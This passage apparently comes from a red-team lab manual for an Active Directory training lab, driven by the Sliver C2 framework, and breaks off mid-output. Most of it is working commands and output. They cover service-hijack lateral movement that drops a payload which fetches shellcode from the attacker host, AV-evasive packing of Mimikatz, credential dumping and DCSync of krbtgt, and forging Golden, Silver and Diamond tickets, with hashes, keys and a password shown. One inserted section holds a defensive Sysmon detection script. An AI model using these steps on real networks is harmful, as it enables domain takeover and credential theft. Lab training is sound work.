[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 699255
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBB[snip]

[*] Target LUID: 0xaab77
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fbhvuQhtRTYbD483RPrHQxsjm6hPnOhjtdU2YbhrfLk=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'

\\dcorp-dc\c$\ (15 items, 1.3 GiB)
==================================
drwxrwxrwx $Recycle.Bin <dir> Thu Dec 14 04:15:02 -0800 2023
drwxrwxrwx $WinREAgent <dir> Tue Jan 09 11:13:39 -0800 2024

[...........snip...........]

We can now use scshell to move laterally. Before doing so we enumerate services remotely to target.
Enumerate remote services using the sa-sc-enum command (BOF).

[server] sliver (dcorp-ci_tcp) > sa-sc-enum dcorp-dc

[*] Successfully executed sa-sc-enum (coff-loader)

[*] Got output:

[.............snip..............]

SERVICE_NAME: wmiApSrv
DISPLAY_NAME: WMI Performance Adapter
TYPE : 16 WIN32_OWN
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0
SERVICE_EXIT_CODE : 0
CHECKPOINT : 0
WAIT_HINT : 0
PID : 0
FLAGS : 0
TYPE : 10 WIN32_OWN
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\wbem\WmiApSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WMI Performance Adapter
DEPENDENCIES :
SERVICE_START_NAME : localSystem
RESET_PERIOD (in seconds) : 900
REBOOT_MESSAGE :
COMMAND_LINE :
FAILURE_ACTIONS : RESTART -- Delay = 120000 milliseconds
FAILURE_ACTIONS : RESTART -- Delay = 300000 milliseconds
FAILURE_ACTIONS : NONE -- Delay = 0 milliseconds
The service has not registered for any start or stop triggers.

Querying the service with the sa-sc-sq BOF shows that the wmiApSrv service runs as SYSTEM, so it is a
good target service for credential dumping.

Begin by setting up (or reusing) the pivot listener on dcorp-stdX on port 8080 and generate an appropriate
tcp pivot implant.

[server] sliver (dcorp-std_https) > pivots tcp --lport 8080
[*] Started tcp pivot listener :8080 with id 1

[server] sliver (dcorp-std_https) > generate --tcp-pivot 172.16.100.X:8080 -f shellcode -e --name dcorp-dc_tcp
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m6s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-dc_tcp.bin

Upload the NtDropper to the dcorp-dc temp folder.

[server] sliver (dcorp-std_https) > upload -t 180 '/mnt/c/AD/Tools/NtDropper.exe' '\\dcorp-dc\c$\Windows\Temp\NtDropper.exe'
[*] Wrote file to \\dcorp-dc\c$\Windows\Temp\NtDropper.exe


Host the generated shellcode using WSL or HFS.

Now use scshell to gain a SYSTEM tcp pivot session on dcorp-dc.

NOTE: Attempt execution multiple times if it fails on the first attempt.


[server] sliver (dcorp-std_https) > scshell -t 180 dcorp-dc wmiApSrv 'C:\Windows\System32\cmd.exe /c start /b C:\Windows\temp\NtDropper.exe 172.16.100.X dcorp-dc_tcp.bin'

[*] Successfully executed scshell (coff-loader)

[*] Got output:
Trying to connect to dcorp-dc
Using current process context for authentication. (Pass the hash)
SC_HANDLE Manager 0x0000000000126c10
Opening wmiApSrv
SC_HANDLE Service 0x0000000000126eb0
LPQUERY_SERVICE_CONFIGA need 0x0000013a bytes
Original service binary path "C:\Windows\system32\wbem\WmiApSrv.exe"
Service path was changed to "C:\Windows\System32\cmd.exe /c start /b C:\Windows\temp\NtDropper.exe 172.16.100.X dcorp-dc_tcp.bin"
Service was started
Service path was restored to "C:\Windows\system32\wbem\WmiApSrv.exe"

[*] Session 56b853d7 dcorp-dc_tcp - 172.16.100.X:50024->dcorp-std_https-> (dcorp-dc) - windows/amd64 - Wed, 17 Jan 2024 04:16:07 PST

[server] sliver (dcorp-std_https) > sessions -i 56b853d7

[*] Active session dcorp-dc_tcp (56b853d7)
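
From the target's point of view, the scshell output above is also the detection story: the Service Control Manager rewrites the service's ImagePath, starts cmd.exe as a child of services.exe, and restores the path a second later. The following is an added example, not code from the lab manual, Sliver or scshell, that runs three checks over constructed Sysmon Event ID 13 (registry value set) and Event ID 1 (process creation) records. Field names follow Sysmon; the timestamps, process ids, the ExampleAgent service and the 60-second flip window are assumptions for this example.

```python
"""Detect service binary-path hijacking from Sysmon registry and process-creation events.

Added example for this lab manual; not code from Sliver, scshell or Sysmon.
Records are constructed tab-separated Key=Value lines using Sysmon field
names (UtcTime, Image, TargetObject, Details, ParentImage, CommandLine).
"""
import re
from datetime import datetime

SERVICE_IMAGEPATH_RE = re.compile(r"\\Services\\(?P<service>[^\\]+)\\ImagePath$", re.IGNORECASE)
# Interpreters a service's ImagePath should never resolve to.
SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe", "\\cscript.exe")
# Two writes to the same ImagePath within this many seconds are treated as a
# change-and-restore pair (assumption for this example).
FLIP_WINDOW_S = 60


def parse_event(line):
    """Split a constructed 'Key=Value<TAB>Key=Value' record into a dict."""
    event = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event


def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def detect(lines):
    """Return findings as dicts with a 'rule' key plus context, in detection order."""
    findings = []
    imagepath_writes = {}  # service -> [(timestamp, new value), ...]
    for ev in (parse_event(l) for l in lines):
        if ev.get("EventID") == "13":
            m = SERVICE_IMAGEPATH_RE.search(ev.get("TargetObject", ""))
            if not m:
                continue
            service = m.group("service").lower()
            value = ev.get("Details", "")
            imagepath_writes.setdefault(service, []).append((_ts(ev), value))
            # Rule 1: the new binary path runs an interpreter or lives in a temp directory.
            low = value.lower()
            if any(s in low for s in SHELLS) or "\\temp\\" in low:
                findings.append({"rule": "imagepath-suspicious-value", "service": service, "value": value})
        elif ev.get("EventID") == "1":
            parent = ev.get("ParentImage", "").lower()
            image = ev.get("Image", "").lower()
            # Rule 2: the Service Control Manager itself spawning a shell.
            if parent.endswith("\\services.exe") and image.endswith(SHELLS):
                findings.append({"rule": "services-spawned-shell", "pid": ev.get("ProcessId"),
                                 "commandline": ev.get("CommandLine", "")})
    # Rule 3: ImagePath flipped to a different value and back within the window.
    for service, writes in imagepath_writes.items():
        writes.sort(key=lambda w: w[0])
        for (t_prev, v_prev), (t_cur, v_cur) in zip(writes, writes[1:]):
            if v_prev != v_cur and (t_cur - t_prev).total_seconds() <= FLIP_WINDOW_S:
                findings.append({"rule": "imagepath-change-and-restore", "service": service,
                                 "from": v_prev, "to": v_cur})
    return findings


def _rec(**fields):
    return "\t".join(f"{k}={v}" for k, v in fields.items())


# Constructed records mirroring the scshell sequence, followed by two benign ones.
SAMPLE_EVENTS = [
    _rec(EventID=13, UtcTime="2024-01-17 12:16:05.101", Image=r"C:\Windows\system32\services.exe",
         TargetObject=r"HKLM\System\CurrentControlSet\Services\wmiApSrv\ImagePath",
         Details=r"C:\Windows\System32\cmd.exe /c start /b C:\Windows\temp\NtDropper.exe 172.16.100.X dcorp-dc_tcp.bin"),
    _rec(EventID=1, UtcTime="2024-01-17 12:16:05.233", ProcessId=6120, Image=r"C:\Windows\System32\cmd.exe",
         ParentImage=r"C:\Windows\system32\services.exe",
         CommandLine=r"C:\Windows\System32\cmd.exe /c start /b C:\Windows\temp\NtDropper.exe 172.16.100.X dcorp-dc_tcp.bin"),
    _rec(EventID=13, UtcTime="2024-01-17 12:16:06.412", Image=r"C:\Windows\system32\services.exe",
         TargetObject=r"HKLM\System\CurrentControlSet\Services\wmiApSrv\ImagePath",
         Details=r"C:\Windows\system32\wbem\WmiApSrv.exe"),
    _rec(EventID=1, UtcTime="2024-01-17 12:20:00.000", ProcessId=2780, Image=r"C:\Windows\system32\wbem\WmiApSrv.exe",
         ParentImage=r"C:\Windows\system32\services.exe", CommandLine=r"C:\Windows\system32\wbem\WmiApSrv.exe"),
    _rec(EventID=13, UtcTime="2024-01-17 13:00:00.000", Image=r"C:\Windows\system32\msiexec.exe",
         TargetObject=r"HKLM\System\CurrentControlSet\Services\ExampleAgent\ImagePath",
         Details=r"C:\Program Files\ExampleAgent\agent.exe"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Rule 3 is the one that survives an attacker choosing a less obvious binary path than cmd.exe: a legitimate reconfiguration rarely rewrites the same ImagePath twice within a minute, whereas the restore step is inherent to this technique.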


Access the dcorp-dc session spawned and use the previously generated PEzor repackaged C# Mimikatz
binary to dump logonpasswords.

[server] sliver (dcorp-dc_tcp) > whoami

Logon ID: NT AUTHORITY\SYSTEM

[*] Current Token ID: NT AUTHORITY\SYSTEM

[server] sliver (dcorp-dc_tcp) > ps

Pid Ppid Owner Arch Executable Session
====== ====== ============================== ======== ======== ========
[.......snip........]
6488 772 NT AUTHORITY\NETWORK SERVICE x86_64 svchost.exe 0
2780 772 NT AUTHORITY\SYSTEM x86_64 WmiApSrv.exe 0
6872 3804 x86_64 SenseIR.exe 0

Security Product(s): Windows Defender MDE, Windows Defender, Windows Defender MDE

[server] sliver (dcorp-dc_tcp) > execute-assembly -P 2780 -p 'C:\windows\system32\wbem\WmiApSrv.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.packed.dotnet.exe'

[*] Output:

[snip]

mimikatz(commandline) # sekurlsa::ekeys

Authentication Id : 0 ; 1879285 (00000000:001cacf5)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 1/17/2024 4:23:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500

* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
des_cbc_md4 af0686cc0ca8f04df42210c9ac980760
des_cbc_md4 af0686cc0ca8f04df42210c9ac980760
des_cbc_md4 af0686cc0ca8f04df42210c9ac980760
des_cbc_md4 af0686cc0ca8f04df42210c9ac980760
des_cbc_md4 af0686cc0ca8f04df42210c9ac980760

Authentication Id : 0 ; 886621 (00000000:000d875d)
Session : RemoteInteractive from 2
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 1/17/2024 4:14:19 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
des_cbc_md4 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
des_cbc_md4 b38ff50264b74508085d82c69794a4d8

Authentication Id : 0 ; 823134 (00000000:000c8f5e)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/17/2024 4:13:59 AM
SID : S-1-5-90-0-2

* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : cd 86 [snip]
* Key List :
des_cbc_md4 064e5b7d9d78d3645e786a30df02b5893bf7cb44ba11749538896c0e66f953d3
des_cbc_md4 c7e5d82f4b335144af5fcd6775069b18
des_cbc_md4 36abeac4022fa23f94dd8480c67b5e6e
des_cbc_md4 36abeac4022fa23f94dd8480c67b5e6e
des_cbc_md4 36abeac4022fa23f94dd8480c67b5e6e
des_cbc_md4 36abeac4022fa23f94dd8480c67b5e6e
des_cbc_md4 36abeac4022fa23f94dd8480c67b5e6e


Create and abuse a Golden ticket
Using PEzor and Rubeus
To begin creating a Golden ticket we require the krbtgt hash from dcorp-dc. We can obtain it by directly
executing lsadump::lsa /inject or by performing a DCSync locally or remotely using lsadump::dcsync
/user:dcorp\krbtgt. We will be showcasing the DCSync method.

Back on dcorp-stdX, spawn a new Ubuntu WSL prompt and use PEzor as before to convert mimikatz into
a .NET binary with DCSync arguments, then rename the binary accordingly as follows.
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/PEzor/

wsluser@dcorp-studentX:/mnt/c/AD/Tools/PEzor$ sudo su
[sudo] password for wsluser: WSLToTh3Rescue!

root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p '"privilege::debug" "lsadump::dcsync /user:dcorp\krbtgt" "exit"'

---------------------------------------------------------------------------
[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (console) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)
[ Copyright (c) 2019-2021 TheWover, Odzhan

[ Instance type : Embedded
[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "privilege::debug" "lsadump::dcsync /user:dcorp\krbtgt" "exit"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.LZON5B8Mqa/shellcode.cs"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows


root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.packed.dotnet.exe

DCSync from the dcorp-stdX session (remotely) or use the current dcorp-dc session using
mimikatz-dcsync.exe.packed.dotnet.exe.

[server] sliver (dcorp-dc_tcp) > execute-assembly -P 2780 -p 'C:\windows\system32\wbem\WmiApSrv.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.packed.dotnet.exe'

[*] Output:

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd



* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

mimikatz(commandline) # exit
Bye!

[..........snip........]

Craft a Golden Ticket from the dcorp-stdX session using Rubeus and the krbtgt AES256 key, abusing SID History injection: the /sids value adds a Domain Controllers group SID (RID 516) from another domain in the forest and S-1-5-9 (Enterprise Domain Controllers) to the ticket's PAC.

We can save the ticket as golden.tkt using the Rubeus /outfile parameter for persistent use, or, as here, use /ptt to import it straight into the current logon session.

NOTE: Since arguments to the fork-and-run execute-assembly are limited to 256 characters, we use inline-execute-assembly instead to overcome the argument limitation.

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe 'golden /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:administrator /id:1000 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9 /dc:DCORP-DC.dollarcorp.moneycorp.local /ptt'

[*] Successfully executed inline-execute-assembly (coff-loader)


[*] Got output:
[+] Success - Wrote 1040169 bytes to memory
[+] Using arguments: golden /aes256:154cb6624b1d859f7080a6615adc488f09f928438
79b3d914cbcb5a8c3cda848 /user:dcorp-dc$ /id:1000 /domain:dollarcorp.moneycorp
.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122
-960912869-3279953914-516,S-1-5-9 /dc:DCORP-DC.dollarcorp.moneycorp.local /pt
t

[*] Action: Build TGT



[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (DOLLARCORP)


[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 1000
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'administrator@dollarcorp.moneycorp.local'

[*] AuthTime : 1/17/2024 5:33:54 AM


[*] StartTime : 1/17/2024 5:33:54 AM
[*] EndTime : 1/17/2024 3:33:54 PM
[*] RenewTill : 1/24/2024 5:33:54 AM

[*] base64(ticket.kirbi):

doIGVDCCBlCgAwIB[snip]

[+] Ticket successfully imported!

[+] inlineExecute-Assembly Finished

The forged TGT is now in the logon session and can be reused (or re-imported from golden.tkt if it was saved with /outfile) whenever Domain Admin rights are needed. Confirm it was imported with klist, then check Domain Admin access to dcorp-dc by listing the C$ admin share.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe klist

[*] Successfully executed inline-execute-assembly (coff-loader)


[*] Got output:
[+] Success - Wrote 1039886 bytes to memory
[+] Using arguments: klist

Action: List Kerberos Tickets (Current User)



[*] Current LUID : 0xd01c0

UserName : studentX
Domain : dcorp
LogonId : 0xd01c0
UserSID : S-1-5-21-719815819-3726368948-3917688648-5101
AuthenticationPackage : Negotiate
LogonType : RemoteInteractive
LogonTime : 1/17/2024 12:45:33 AM
LogonServer : DCORP-DC
LogonServerDNSDomain : DOLLARCORP.MONEYCORP.LOCAL
UserPrincipalName : studentX@dollarcorp.moneycorp.local

[0] - 0x12 - aes256_cts_hmac_sha1


Start/End/MaxRenew: 1/17/2024 5:33:54 AM ; 1/17/2024 3:33:54 PM ; 1/24/2024 5:33:54 AM
Server Name : krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
Client Name : administrator @ DOLLARCORP.MONEYCORP.LOCAL
Flags : pre_authent, initial, renewable, forwardable (40e00000)

[+] inlineExecute-Assembly Finished

[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'

\\dcorp-dc\c$\ (15 items, 1.0 GiB)


==================================
drwxrwxrwx $Recycle.Bin <dir> Thu Dec 14 04:15:02 -0800 2023
drwxrwxrwx $WinREAgent <dir> Tue Jan 16 03:11:43 -0800 2024
[snip]

Make sure to purge the forged tickets from the logon session once done.

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe purge

[*] Action: Purge Tickets


Luid: 0x0
[+] Tickets successfully purged!

[+] inlineExecute-Assembly Finished



Learning Objective 9
Try to get command execution on the domain controller by creating silver ticket for:

• HOST service

• WMI

Command execution on dcorp-dc via HOST service


Using Rubeus, PEzor and sa-schtasksenum
We use the dcorp-dc$ machine account NTLM hash compromised in the last objective to craft a Silver Ticket for the HOST service on dcorp-dc with Rubeus. The /ldap option makes Rubeus build the PAC from the user's LDAP attributes; we supply our student credentials in /creduser and /credpassword so that lookup authenticates consistently whatever tickets are currently in the session.

NOTE: We keep reusing the current logon session through inline-execute-assembly, as in the previous objective. If ticket imports start behaving inconsistently, purge the tickets (Rubeus purge) or reboot the student machine.

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe 'silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:36abeac4022fa23f94dd8480c67b5e6e /sid:S-1-5-21-719815819-3726368948-3917688648 /user:Administrator /domain:dollarcorp.moneycorp.local /ptt /ldap /creduser:dollarcorp.moneycorp.local\studentX /credpassword:JPIzbuWHdSfq9NFr'

[*] rubeus output:

[snip]

[*] Action: Build TGS


[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (DOLLARCORP)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : host
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'host/dcorp-dc.dollarcorp.moneycorp.local'



[*] AuthTime : 1/17/2024 7:05:15 AM
[*] StartTime : 1/17/2024 7:05:15 AM
[*] EndTime : 1/17/2024 5:05:15 PM
[*] RenewTill : 1/24/2024 7:05:15 AM

[*] base64(ticket.kirbi): [snip]


[+] Ticket successfully imported!

We can prove the HOST ticket is accepted by enumerating scheduled tasks on dcorp-dc with the built-in sa-schtasksenum command; the Task Scheduler interface authenticates against the host/ SPN, so the forged ticket is the one presented.
[server] sliver (dcorp-std_https) > sa-schtasksenum -t 40 dcorp-dc.dollarcorp.moneycorp.local

[*] Successfully executed sa-schtasksenum (coff-loader)


[*] Got output:
Task 1
Name: Browse
Path: \Browse
Enabled: True
Last Run: 1/17/2024 7:09:55 AM
Next Run: 12:00:00 AM
Current State: READY
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/t
ask">
<RegistrationInfo>
<Date>2022-11-14T19:42:09</Date>
<Author>dcorp\administrator</Author>
<URI>\Browse</URI>
</RegistrationInfo>
<Principals>
<Principal id="Author">
<UserId>S-1-5-21-1874506631-3219952063-538504511-500</UserId>
<LogonType>Password</LogonType>
</Principal>
</Principals>
<Settings> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
</Settings>

[.............snip.............]

To go from task enumeration to a shell via schtasks, we can use an external tool such as SharpTask.



Command execution on dcorp-dc via WMI service
Using Rubeus and SharpWMI
Similarly, WMI access requires two Silver Tickets, one for HOST and one for RPCSS. Since the HOST ticket is already imported, import an RPCSS ticket with Rubeus.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe 'silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:36abeac4022fa23f94dd8480c67b5e6e /sid:S-1-5-21-719815819-3726368948-3917688648 /user:Administrator /domain:dollarcorp.moneycorp.local /ptt /ldap /creduser:dollarcorp.moneycorp.local\studentX /credpassword:JPIzbuWHdSfq9NFr'

[*] rubeus output:

[snip]

[*] Action: Build TGS


[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (DOLLARCORP)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : host
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'rpcss/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime : 1/17/2024 7:05:15 AM


[*] StartTime : 1/17/2024 7:05:15 AM
[*] EndTime : 1/17/2024 5:05:15 PM
[*] RenewTill : 1/24/2024 7:05:15 AM

[*] base64(ticket.kirbi): [snip]


[+] Ticket successfully imported!

To test WMI rights we can use CIMplant or SharpWMI. Here we query the Win32_Process class on dcorp-dc with SharpWMI; once that works, SharpWMI can also be used for command and shell execution over WMI.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\system32\taskhostw.exe' -t 45 '/mnt/c/AD/Tools/SharpWMI.exe' 'action=query query="select * from win32_process" computername=dcorp-dc'

[*] sharp-wmi output

Scope: \\dcorp-dc\root\cimv2

Caption : System Idle Process


CommandLine :
CreationClassName : Win32_Process
CreationDate : 20220926200515.136825-420
CSCreationClassName : Win32_ComputerSystem
CSName : DCORP-DC
Description : System Idle Process
ExecutablePath :
ExecutionState :
Handle : 0
HandleCount : 0
InstallDate :
KernelModeTime : 258140468750
MaximumWorkingSetSize :
MinimumWorkingSetSize :
Name : System Idle Process
OSCreationClassName : Win32_OperatingSystem
OSName : Microsoft Windows Server 2016 Standard|C:\Windows|\Device\Harddisk0\Partition2
OtherOperationCount : 0
OtherTransferCount : 0
PageFaults : 2
PageFileUsage : 0
ParentProcessId : 0
PeakPageFileUsage : 0
PeakVirtualSize : 65536
PeakWorkingSetSize : 4
Priority : 0
PrivatePageCount : 0
ProcessId : 0

[............snip...........]

Purge all imported tickets using Rubeus.

[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe purge

[*] Output:
[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!



Learning Objective 10
Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.

Execute the Diamond Ticket attack


Using Rubeus
A Diamond Ticket is built by requesting a real TGT (/tgtdeleg), decrypting it with the krbtgt key, modifying its PAC (here: administrator, RID 500, Domain Admins) and re-encrypting it, so unlike a Golden Ticket it is backed by a genuine AS-REQ/AS-REP exchange. We can simply use the following Rubeus command to execute the attack. Make sure to switch back to the dcorp-stdX session to perform the attack.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/Tools/Rubeus.exe 'diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /show /ptt'

[*] Successfully executed inline-execute-assembly (coff-loader)


[*] Got output:

[*] Action: Diamond Ticket

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'


[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dcorp-dc.dollarcorp.moneycorp.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 6rZkB/3vxjzRoxV4GhAHTMukK8DwWI2YjHAhPzdpeQA=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
